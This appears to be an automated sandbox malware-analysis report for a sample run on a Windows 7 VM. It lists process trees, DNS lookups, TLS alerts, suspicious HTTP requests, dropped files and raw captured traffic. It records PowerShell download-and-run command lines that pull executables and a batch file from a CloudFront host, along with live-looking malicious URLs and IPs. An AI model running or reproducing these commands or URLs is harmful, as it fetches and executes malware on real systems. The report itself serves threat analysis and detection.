Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | April 27, 2024, 11:54 a.m. | April 27, 2024, 11:56 a.m. |
-
-
-
powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000','stat')"
2188 -
powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"
2288 -
i1.exe i1.exe /SUB=2838 /str=one
2504 -
powershell.exe powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=444', 'i2.bat')"
2592 -
powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=456','i3.exe')"
2948
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
apps.identrust.com |
CNAME
a1952.dscq.akamai.net
CNAME
identrust.edgesuite.net
|
23.210.247.48 |
monoblocked.com | 45.130.41.108 | |
240216234727901.mjj.xne26.cfd | 94.156.35.76 | |
d68kcn56pzfb4.cloudfront.net | 99.86.146.198 |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.103:49163 99.86.146.198:443 |
C=US, O=Amazon, CN=Amazon RSA 2048 M01 | CN=*.cloudfront.net | fa:21:45:dc:4d:94:03:a3:09:77:51:78:4a:21:f2:c5:6d:94:be:52 |
TLSv1 192.168.56.103:49182 99.86.146.198:443 |
C=US, O=Amazon, CN=Amazon RSA 2048 M01 | CN=*.cloudfront.net | fa:21:45:dc:4d:94:03:a3:09:77:51:78:4a:21:f2:c5:6d:94:be:52 |
TLSv1 192.168.56.103:49176 99.86.146.198:443 |
C=US, O=Amazon, CN=Amazon RSA 2048 M01 | CN=*.cloudfront.net | fa:21:45:dc:4d:94:03:a3:09:77:51:78:4a:21:f2:c5:6d:94:be:52 |
TLSv1 192.168.56.103:49172 99.86.146.198:443 |
C=US, O=Amazon, CN=Amazon RSA 2048 M01 | CN=*.cloudfront.net | fa:21:45:dc:4d:94:03:a3:09:77:51:78:4a:21:f2:c5:6d:94:be:52 |
TLSv1 192.168.56.103:49169 99.86.146.198:443 |
C=US, O=Amazon, CN=Amazon RSA 2048 M01 | CN=*.cloudfront.net | fa:21:45:dc:4d:94:03:a3:09:77:51:78:4a:21:f2:c5:6d:94:be:52 |
TLSv1 192.168.56.103:49183 45.130.41.108:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=monoblocked.com | 2c:d3:99:84:08:33:38:25:31:da:34:23:da:07:ec:a6:6f:e6:0a:ac |
section | .ndata |
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://185.172.128.59/ISetup1.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000 | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=425&c=1000 | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=456 |
request | GET http://185.172.128.59/ISetup1.exe |
request | GET http://240216234727901.mjj.xne26.cfd/f/fvgbm0216901.txt |
request | GET http://apps.identrust.com/roots/dstrootcax3.p7c |
request | GET https://d68kcn56pzfb4.cloudfront.net/load/load.php?c=1000 |
request | GET https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000 |
request | GET https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=425&c=1000 |
request | GET https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=444 |
request | GET https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=456 |
file | C:\Users\test22\AppData\Local\Temp\i1.exe |
file | C:\Users\test22\AppData\Local\Temp\nsvC242.tmp\INetC.dll |
file | C:\Users\test22\AppData\Local\Temp\nsvC242.tmp\lood.bat |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=444', 'i2.bat')" |
cmdline | powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000','stat')" |
cmdline | powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')" |
cmdline | powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=456','i3.exe')" |
file | C:\Users\test22\AppData\Local\Temp\i1.exe |
file | C:\Users\test22\AppData\Local\Temp\nsvC242.tmp\INetC.dll |
file | C:\Users\test22\AppData\Local\Temp\i1.exe |
Data received | [ |
Data received | W]f5BvC@® yÛR&rº,Pø¾sDOWNGRD UÚ»àÝ\ÇZ»ñî0¸ yíõ'V ½²y¡øÀ ÿ |
Data received | b |
Data received | 6`¨^\ ²/Yöù%CçiRáqãØ- NoöÈIÙ¶óV®+¶tëÏû&ãº.j;XGVÿ% pSÚtÃgh:ß@ZJNÏC;çVÖ pËRî{}®:ç¼1ùEöÂ`ÏY+Ì4Gß¹ÞemÏ,¦¦çÞ I|fN£:m©µî4.º ¸3ßGë±k%ÙÎÑEF2pÞIC ¶ls»dêaA¬ÉÔTß/Ç"²&ÌYThü¾*/ÄUu@` U9 £ð0í0Uÿ0ÿ0Uÿ0U_ ߪ×0+8¢¸mJò0U#0¿_·ÑÎÝô[U¬Üשç0O+C0A0+0http://o.ss2.us/0!+0http://x.ss2.us/x.cer0&U00 http://s.ss2.us/r.crl0U 00U 0 *H÷ #ãWÊ}éyLñUýÌSn>GßÆUò²6íSÄ]4(k¾ÇUügêË?²3ÍXøø/õ`ÔÎñÁݧuO¹mÞ÷º~@,íÁê»v3w SÝd«'ñiÕM^®ô¡Ãu§XD-ò<p¬ºi¶w1^,ü :Giðy_ôT¤^x`'ÎÂwÿ#Sw]ºÿêYçÛϯï$5zÆ}ö?ßõrTá©Y{¿R.F² dvHÓØyènVÌ®,×8äÊ [ÿ°¨4IßV©÷°_í3íG·0]ô |
Data received | K |
Data received | G AbHµõfs°øÈOÑçÔè @ÇA.åòÍmü Î øO(!PPÒZÉÝeËæ·ØãU4S-뺮ÿ_ p s1¬]'*´Làí8¿øçÑÙ@w.ÏûK`íæåEÑ/gI? ¬½½ÖÐ?fð¢w·DåáÌÔGDè²ÜHGxý~xô]{QÄóoZIGh¦Ptì 9ÈÚ9ïgsNë¼y çð·PB £\(ÜÝ0/6ºí~ãÍ\Ssj ÃË,»¡S¯`£2é±úÏçÌh+`[Rý^[ìG½ÇÈtJ¤¨²SM¥b1dðU}g«u®¤w/ºêÀþÅ<±d»&V¢ ªØÐ0¤©ü¸ñX+:n¾ÕÈ |
Data received | |
Data received | |
Data received | |
Data received | |
Data received | 0 |
Data received | vwÊêu;ÓóÈSÚ;AkTà¥& &> ÅS{D^ßZúû»e |
Data received | |
Data received | óYWr@Ùú̾,h§îT·d¡òÆ@9¥3TÃGSM>ÍiÍã'×0JåöÁÂV££êÑ®o+þ`oÕ^'ºÇÁu ÙíIGm¹½ûyÁd`¦4F¯¿ã#íúã²Ò¾Hr. [´ÿ¥À¨#'GÒú%Up ýONT´è5ê»$gÃöÃK`¶ãUئYåÅbÀAê(:í'6F.ñY@s1XÒÒzP s^VsZÇÒ(GqKöÀä¦× }yãâô-|'¿Â³sÇì)zNÉMlÙç,&ê±DiÓ´ÎqW(S3ãÞ4ÌÂÆß7Ö÷]à¦gxéß4-qÍÓdû);G§UÕÃÊbÆM˸KY¼¸îÈlÿ2RØ(ÐrWìã4¹÷ü£Q_«>#n!Åý~>w±Jpl²ªêdM»~Ilão5Hivؼ-zà,Kx?+\»¤ 6¤ÈT6Ej §ä |
Data received | WÏ»4Ãcxû=µ2£o´¾Ñ|OÈDOWNGRD :ØøJiòÆ7ÀM9È/ÞâgFB Ý()xÜèÀ ÿ |
Data received | G ALà,jqª+í¢ÔÉk? øE¿Ê)(uÉbïôþÉ¿Tv^vèG ºîê@S9aº zRéß1^,|(lWs.ÐRv RìÇó4ú2[?º7Nza4¶þNªóF/íß.Ö õµ½$\êZã× Ò&ËÉh^/o¨ ÝÐäÉ8r Ãp u(Àä¡-«à/Ö°y¥@ "ãcÒФEWãTºY:Md'§+ÊÏ ºÉ[èºÎvR¦ÕI=B¸]Üpb»,ÙQ/ít¿"¨zØH(»;ÂX@!`vr7hZ$ôá>¢xÜ{©Öw6üíÃd¼:¹ó\ ù0ѨlÊÛÆÒÑ7xH@ë-ÉP^wÊ»ØÞ |
Data received | Wû!ªie4¶w¹tA5°i / '÷Å®|Ð6¤¥FMä> @ÉixÈ© |
Data received | Ð |
Data received | : öÇ tOltJ?Ãí®%ÑûÚC`¤÷ÒÚ P¹0?M¶;k!Ú%óÑPêsãÃDæFTAIÔBmwZ: ᾸÜÓ·ãkT{#å×ü,g;KãîEEüHéÌSKÄÍ$$C|^ì u Zîùñâ¼<§®ù@¿d*Ã5/@,âÏ6ëø\0A7\TS00ËgÛàñ¾i©øEûú0¶äà'WÓ}¤)·Bù¸;\z PÚi³]ÅÛÍ9·ãlÝlhhûp]R}üF];ðå#§ã&/ÜRÿ¾<ÞqBâÕNèt¹*%¤+¥ÄJ¼ÖÖ7½ðUeM¥ 7Aß°íhWÝîâg·¾À®©°¿¦Á_ÇLù¶uó)sÝXPBËåù0âÝÕ g±}¡¥)@~â nÈ£rIIÓ;UÀ¸,rëÉjàÞAÇÜ@¡Î﮳z~rëO (ÒæYEXêZŦDá4¨×»³+ªûµpnøÚ¬H?4bê]»ÞË´ËUbrè¥êíÃÛr¹, |
Data received | HTTP/1.1 200 OK Date: Sat, 27 Apr 2024 02:54:57 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Sat, 27 Apr 2024 02:45:01 GMT ETag: "6be01-6170b01c1a262" Accept-Ranges: bytes Content-Length: 441857 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program MZ ÿÿ ¸ @ è º ´ Í!¸LÍ!This program cannot be run in DOS mode. $ ÔKuº[Kuº[Kuº[F'e[Uuº[F'Z[Ãuº[F'[[duº[B )[Huº[Ku»[;uº[þë_[Juº[F'a[Juº[þëd[Juº[RichKuº[ PE L |Pd à zÄ A 0 @ ÀÅ ö ô ( 0Ä%k ÅT 2 8 È @ 0 .text `.rdata Îl 0 n @ @.data (Â ° @ À.rsrc %k 0Ä l < @ @.reloc T Å ¨ @ B ¹Lèu h(A è_' |